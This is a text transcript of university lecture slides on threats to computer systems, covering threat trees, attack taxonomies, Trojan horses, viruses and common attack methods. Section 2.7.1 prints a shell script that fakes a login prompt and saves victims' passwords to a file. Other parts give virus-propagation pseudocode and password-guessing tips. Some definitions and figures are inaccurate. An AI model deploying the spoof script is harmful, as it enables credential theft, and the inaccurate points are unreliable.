chapter 2 threats to computer systems. 2.1 threats, vaulnerabilities and attacks §threats: l...
Post on 21-Dec-2015
226 views
TRANSCRIPT
![Page 1: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/1.jpg)
Chapter 2
Threats To Computer Systems
![Page 2: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/2.jpg)
2.1 Threats, Vaulnerabilities and Attacks
Threats: defines as any potential occurrence, malicious
and otherwise, that can have undesirable effect on the assets and resources associated with a computer system
Vulenerability: is some unfortunate characteristic that makes it
possible for a threat to potentially occur
![Page 3: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/3.jpg)
Attack: is some action taken by malicious intruder that
involves the exploitation of certain vulnerabilities in order to cause an existing threats to occur
![Page 4: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/4.jpg)
•2.2 Types of Threats
Categorization is needed to allow establishment of simple framework for understanding and solving security problems
Three main types of threats disclosure threat integrity threat denial of service threat
![Page 5: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/5.jpg)
2.2.1 Disclosure threat
This threat involves the dissemination of information to an individual for whom that information should not be seen
This information may be in computer storage or in transit between computer systems
disclosure of information is called “leak”important for confidential organization such
as military, government etc.
![Page 6: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/6.jpg)
2.2.2 Integrity threat
This threat involves any unauthorized change to information stored on a computer system or in transit between computer systems
non-critical information has less consequencecritical information can be disastrousimportant for battle plans and commercial
activities
![Page 7: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/7.jpg)
2.2.3 Denial of service threat
This threat arises whenever access to some computer system resource is intentionally blocked as a result of malicious action taken by another user
critical for delaying weapon deployment or stock dealing
because the services are temporal characterized, this threat is more difficult to address than others
![Page 8: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/8.jpg)
2.3 System Security Engineering
To deal with problems of threats, vulnerabilities and attacks, a new discipline has recently emerged in the security community known as system security engineering
security engineering process (Fig. 2.1) will involve understanding of the security problems and derives protections against these problems
![Page 9: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/9.jpg)
Specify System Architecture
EstimateComponent Risk
Identify Threats,Vulnerabilites, Attacks
PrioritizeVulnerabilities
Identify and Install Safeguards
Risk isAcceptably Low
Figure 2.1 System Security Engineering Process
![Page 10: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/10.jpg)
Specify System Architecture
Inspect the systemexamine the network, host, interface and
other associate architectureuse a structural specification include current
security methods usedinclude a description of functional propertiescreate a security priority list
![Page 11: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/11.jpg)
Identify Threats, Vulnerabilities, Attacks
Identify potential threats from internal and external sources
estimate possible damage arises from attackestablish methodologies for minimise
possibilities of attack
![Page 12: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/12.jpg)
Estimate Component Risk
Develop risk formulaIdentify risk componentsPrioritize risk factor
![Page 13: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/13.jpg)
Prioritize Vulnerabilities
Base on risk priority developed in previous stage
this stage provide an order for installing security protections
limited resources may exist the high risk component will be deal with first
![Page 14: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/14.jpg)
Identify and Install Safeguards
Identify all possible safeguard approaches include standard security mechanisms
safeguard mechanisms will be examined considerations on minimal in impact,
performance degradation, cost and resources are needed
![Page 15: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/15.jpg)
2.4 Threat Tree
High level threats serve as the starting point for further decomposition
threat decomposition is based on a threat treemilitary standard MIL-STD 1785 is usedthreat tree is similar to decision tree used for
risk management & reliability engineering
![Page 16: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/16.jpg)
2.4.1 Arbitrary Threat List Threat can be identified during system
design or developmentit can also identified by a random,
unstructured process called arbitrary threat list process
the list can be enriched during the design, development and operation stages
However, most threats have some unfortunate characteristics
![Page 17: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/17.jpg)
Unfortunate Characteristics
Dubious Completeness: most threats are difficult to be identified completely
Lack of Rationale: known threats are identified by past history however ad hoc nature makes it difficult to rationale
Possible Inconsistencies: threats can be correlated and co-occurred. Independent events cannot prevent contradictory and redundant to be rectified simultaneously.
![Page 18: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/18.jpg)
Arbitrary threat list must be avoidedespecially for some critical system missionsthe development of a threat tree can
overcome most of the shortfalls
![Page 19: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/19.jpg)
2.4.2 Developing a Threat Tree
first identify a list of possible threatsthen introduce them in an iterative manner
and refine the description carefully and gradually
the tree structure allows various threats to be associated in a root-node relationship
this approach can rationale the identified threat and simplify a security solution
![Page 20: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/20.jpg)
2.4.3 Structure of a threat tree
Each tree composes a top label called Threateach label will contain some generalized
description of threat present in a given systemeach root is a sub-threat which represents the
refinement for a given nodethe repetitive process will be terminated when
all threats and sub-threats are identified, i.e. complete
![Page 21: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/21.jpg)
Sub-threat
Threat
Structure of a Threat Tree
![Page 22: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/22.jpg)
Example: Hospital Computer System
Hospital Computer System Threat (HCST) is composed of Patient Medical Information (PMH) and non Patient Medical Information (NPMH)
PMH can further decomposed to Life Threatening (LT) and non Life Threatening (NLT) which both further decomposed to Disclosue (D), Integrity (I) and Denial of Service (DOS)
![Page 23: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/23.jpg)
NMPH can be refined into Billing threat (B) and non Billing Threat (NB). Where both threats are further decomposed into Malicious Developer (MDEV) threats introduced beforehand and those are not (NMDEV) threats
a simplified threat tree for hospital computer system is shown as follows:
![Page 24: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/24.jpg)
Threat Tree of HCS
LT
D
I DOS
PMH
NLT
D I DOS MDEV NMDEV MDEVNMDEV
HCST
NPMH
B NB
![Page 25: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/25.jpg)
Effects:D: confidential patient information is
disclosedI: Patient information is corruptedDOS: Patient information is not availableNMDEV(B) : billing information is
corruptedMDEV (NB): internal schedules are
compromised
![Page 26: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/26.jpg)
2.4.4 Using Threat Tree to Support System Security Engineering
Threat tree allows a structured means for documenting and organizing the estimation and calculations of critical, effort and risk factors
Critical defines the impact of the threat or the gain by introducing security measurements
Effort (E) defines the resources needed to resolve the threat
Risk (R=G/E) defines the normalized impact of threat if being attract
![Page 27: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/27.jpg)
Example on Risk Calculation using (G,E,R) value and maximum risk selection
LT(8,2,4)
I(5,5,1)
PMH(8,2,4)
NLT(2.2,1)
MDEV(1,1,1)
NMDEV(2,1,2)
HCST(8,2,4)
NPMH(2,12)
B(2,1,2)NB(1,1,1)
DOS(8,2,4)D(1,1,1)
![Page 28: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/28.jpg)
2.5 Categorization of Attack
“Computer Crimes are probably the tip of an iceberg - but just how big is the iceberg is no one know” T.Perry & P. Wallich
Traditional three classes: disclosure, integrity and denial of services
Unclassified attacks: internet browsing, computation, storage and whatever
To acoount for specific type of attack - taxonomies are used
![Page 29: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/29.jpg)
2.5.1 Using an Attack Taxonomy
Attack Taxonomy is defined as any generalized categorization of potential attacks that might occur on a given computer system
Informal analysis can be used to identify threats and analytic means (threat tree) can be used to document attack or by reported experience with a target system
![Page 30: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/30.jpg)
Attack scenarios are sometimes identified for certain classes of systems including real-time, database and LAN and they must be dealt with appropriately in the target system in the early stage of security system development
Precisely determination of the system and attack characteristics with the interaction of environment will subsequently develop the final attack taxonomy by reducing the known attacks
![Page 31: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/31.jpg)
Attack Taxonomy
Target system
Attacks to the Target System
Using an Attack Taxonomy
Attack Taxonomy
(manyknownattacks)
Attack Taxonomy(fewer known
attacks)MitigateSelectattacks
MitigateSelectattacks
•••
Reducing Known Attacks
![Page 32: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/32.jpg)
2.5.2 Considerations in Selecting an Attack Taxonomy
Completeness: the categories of attack should be accompanied by evidence that all potentially unfortunate occurrences have been accounted for in the target system. The attack must be justifiable. However, most attacks are unstructured and system dependent, empirical evidence is the strongest justification for completeness in an attack taxonomy.
![Page 33: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/33.jpg)
Appropriateness: The selected attack taxonomy should appropriately characterize the attacks to the target systems. Assumption like malicious insiders are not present. Tradeoff sometimes required to evaluate common highly appropriate attack and less appropriate attack for a specified target systems
Internal vs. external threats: an attack taxonomy should differentiate between attacks form insider and outsider. Sometimes external attack taxonomy is entirely insecure for insider attack.
![Page 34: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/34.jpg)
2.5.3 Example - Simple Attack Taxonomy
Operators Programmers Data Entry Internal Outside IntrudersPhysicalDestruction
BombingShort Circuits
InformationDestruction
Erasedisks
MaliciousSoftware
MaliciousSoftware
Via modem
DataDidding
MaliciousSoftware
False DataEnrty
Theft ofServices
Theft asuser
UnauthorizedAction
Via modem
Browsing Theft ofMedia
UnauthorizedAction
Via modem
Theft ofInformation
UnauthorizedAction
Via modem
![Page 35: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/35.jpg)
2.5.4 Example: Risk-based Empirical Attack TaxonomySimplified taxonomy cannot cater for the
actual situation, empirical taxonomy with reasonable justification can make it more complete
Possible empirical attacks: external information theft (glancing at
someone’s terminal) external abuse of resources (smashing a disk
drive)
![Page 36: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/36.jpg)
Masquerading (recording and playing back network transmission)
pest programs (installing a malicious program) Bypassing authentication or authority
(password cracking) authority abuse (falsifying records) abuse through inaction (intentionally bad
administration) indirect abuse (using another system to create a
malicious program)
![Page 37: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/37.jpg)
External Information theft unauthorized individual stealing information or
glance at other’s terminal to steal sensitive information like password, salary data, confidential information and so on
Avoid by setting external procedures such as secured terminal room, secured printer or paper shredders for discarding sensitive information
![Page 38: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/38.jpg)
External Abuse of ResourcesThis involves physical destruction of hardware such as
disk drives, circuit boards, communication media and so on
Because this is an integrity attack, attacker must physical access to the physical resources but not necessary the internal resources
physical destruction may include vandalizing, switching off air conditioner or electrical power
sometimes abuse may not damage the hardware such as jamming or tapping
Avoidance by introducing physical security means like locked, guarding, surveillance camera and so on
![Page 39: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/39.jpg)
External Masquerading this involves a malicious intruder successfully
impersonating another user using some mechanism external to the computer system
examples are: tapping communication medium, recording the information transferred and playing back this information in a later time
this attack has been used by network hacker to avoid from being located
Avoidance by setting up proper network security procedures but the techniques are not straightforward
![Page 40: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/40.jpg)
Pest Programs this includes attacks that are set up by malicious
individuals to cause subsequent harma pest program can be views as time bomb, I.e. it
will occur at a much later time this time lag may provide opportunity for an
intruder to cover tracks and avoid being caught instantaneous
well know types are Trojan horse and virus attacksCountering pest program requires secure internal
controls, awareness broadcasting and possible some shield programs
![Page 41: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/41.jpg)
Bypassing of Internal Controls this involves the explicit avoidance of controls that
are set up to protect the resources on a computer system
Bypassing usually refers to authorization, access and authority control. The technique is based on clever use of some existing logical flaw in the system
Examples are well known password cracking techniques that subvert protective approaches that contain flaws and operating system and compiler attacks usually involves logical exploitation of flaws to bypass authority
![Page 42: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/42.jpg)
Active Authority Abusethis attack occurs when an individual is
trusted to perform some type of sensitive or important function and then actively abuses this privilege
Examples falsifying certain data entries or granting services in improper manner
Avoidance is difficult but can be minimized by personnel screening, background checks and even polygraph tests
![Page 43: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/43.jpg)
Abuse through Inaction this involves the willful neglect of duty by some
malicious individualattack occurs whenever some action is required to
avoid a harmful situation but is not performedexample is that an administrator has neglected the
maintenance of a system or recorder in order to cause degraded or denied service
avoidance by identifying all possible inaction, this is the first step for all attack avoidance mechanism.
![Page 44: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/44.jpg)
Indirect Abuse this involves an off-line system and is
characterized by behavior that may appear normal but is actually being carried out as a component or step in some comprehensive attack
Example: an indirect abuse involves the factoring a large number on one system as a mean for breaking a protection routine on another system.
Avoidance is extremely difficult because the appearance is completely normal to the system being used.
![Page 45: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/45.jpg)
2.6 Trojan Horses and Viruses
A type of program that is well known of provide self-reproduction is called Trojan Horse
This program is allow to distribute and propagate across different computer systems and is known as virus
![Page 46: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/46.jpg)
2.6.1 Trojan Horses
A Trojan Horse program shall be defined as any program that is expected to perform some desirable function but that actually performs some unexpected and undesirable function
It means that Trojan Horse program may look like a good program but it can potentially turns into harmful
![Page 47: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/47.jpg)
Examples: cat command in unixuser
“cat x”(normal version)
“cat x”(Trojan Horseversion)
Normal sequence ofoperatingsystemroutines
Maliciously altered
sequence ofsystemroutines
![Page 48: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/48.jpg)
In a trusted group, the Trojan Horses is not critical and this approach allows co-workers to share information and resources and the malicious program will not be created
however if Trojan Horses has infiltrated into an trusted environment and can self-reproduced and propagated
this becomes viruses
![Page 49: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/49.jpg)
2.6.2 Viruses
A virus program is defined as any Trojan Horse program that has been designed to self-produce and propagate so as to modify other programs to include a possible modified copy of the virus.
As computer networks have become more widespread, the potential for huge propagation has increased and this type of attack has become serious
![Page 50: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/50.jpg)
Figure below shows how viruses can be created as Trojan horse on one machine and then duplicated on others via some propagation means
Trojan HorseCreation
System A
Trojan HorseDuplication
Trojan HorseDuplication
System B (connected to system A)
System C (No connection to system A)
Manual propagation
Electronicpropagation
![Page 51: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/51.jpg)
2.6.3 Self-Reproducing Programs
Self reproducing program is the key feature of virus
this feature is created by using the following steps: declare a character string that corresponds to the
main body of the program print each character of the defined string individually print the value of the array as a defined character
string
![Page 52: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/52.jpg)
Example: Self reproduce program
Char t[] ={'0', ' ', '}', 'm', 'a', 'i', 'n', …., 't', ')', ';', '}', 0};
main()
{ int i,
printf(“char t[] ={“);
for (i=0; t[i]!=0;i=i+1)
printf(“%d, “, t[i]);
printf(“%s”, t);
}
![Page 53: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/53.jpg)
Self reproducing program is so critical because it provides the basic mean by which copies of a Trojan horse can be produced automatically
combine such copies with a compiler allows one to create as many copies of the Trojan horse as one desires to compile
insertion of addition codes can cause damage when execute
![Page 54: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/54.jpg)
2.6.4 Typical Virus Operation
Malicious intruders can initiate a virus attack by creating a program that does the following: finds a connected system and sends self-reproducing
code via remote copying command initiates a a remote compilation of the self-
reproducing code via the remote execution command
the process can repeat and affect other systems
![Page 55: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/55.jpg)
Virus DuplicateVirus
DuplicateVirus
(1) send reproducing virus
(2) remotely execute virus
(3) sendreproducingvirus
(4) sendreproducingvirus
Virus Propagation
![Page 56: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/56.jpg)
Example : simple virus operation
virus
while true do
find_host (h);
remote_copy (h,virus);
perform_damage;
remote_execute (h,virus);
od;
![Page 57: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/57.jpg)
Example: Internet Virus
First Internet Virus was reported 1988 and was unleashed by a Cornell University student which has infected over 60,000 host computers
the virus attack data, TCP/IP communication protocol and steal password
the virus was detected and terminated by a team from MIT and Berkeley
however, the designer caught claimed that he has made a mistake in the programming
![Page 58: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/58.jpg)
2.6.5 Trojan Horse CluesPresence of Trojan Horse can be detected by:Suspicious Originator and Distribution: choose
some reliable software/hardware manufacturer and distributor to avoid suspicious system components
Unexpected Size or Other Attributes: if the program size and attributes becomes suspicious, such slow time respond, the program needs to be investigated
Undocumented Origin and Experience:malicious or incompetent source are expected for this issue
![Page 59: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/59.jpg)
2.7 Common Attack Methods
Password SpoofPassword theftlogic bomb mailscheduled file removalfield separator attackinsertion of compiler Trojan Horse
![Page 60: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/60.jpg)
2.7.1 Password Spoof Program
The first type of attack involves spoofing a user into believing that a computer terminal is correctly prompting that user for login and password information
normally, a Trojan Horse program is used to fake the normal login sequence that a user expects
![Page 61: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/61.jpg)
Properties of spoofing program: the attacker gains physical access to the target
individual’s computer terminal the attacker logs onto the target system using
whatever login and password are available to the attacker (if the attacker is an insider, then they could be his own). It is possible to use a different target computer with some procedure change
the Trojan Horse spoof program is left on the terminal for the target individual.
![Page 62: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/62.jpg)
Example: Unix-like command
B1=‘ORIGIN: NODE whd1 MODULE 66 PORT 12’
B2=‘DESTINATION:’
FILE=$HOME/secure/suckers/fools
trap ‘’ 1 2 3 5 15
echo $B1
sleep 1
echo $B2
read dest
echo ‘login:
read login
![Page 63: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/63.jpg)
stty -echo
echo ‘password:
read password
stty echo
echo ‘’
echo $login $ password >>$file
echo ‘login incorrect’
exec login
![Page 64: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/64.jpg)
Responds
ORIGIN: NODE whd1 MODULE 66 PORT 12’
DESTINATION: node/mysystem
login: abc
password:xxxxx
login incorrect
login: abc
password:xxxxx
$
![Page 65: Chapter 2 Threats To Computer Systems. 2.1 Threats, Vaulnerabilities and Attacks §Threats: l defines as any potential occurrence, malicious and otherwise,](https://reader036.vdocument.in/reader036/viewer/2022062320/56649d575503460f94a35c93/html5/thumbnails/65.jpg)
2.7.2 Password theft by clever reasoning
Password are mnemonic and can be guessed easily
First guess example: spouse’s name, children’s name, pet’s name, license plate number, phone number, date of birth, date of marriage, favorite sports team and so on
Second guess example - easy to type pattern: “qaql”
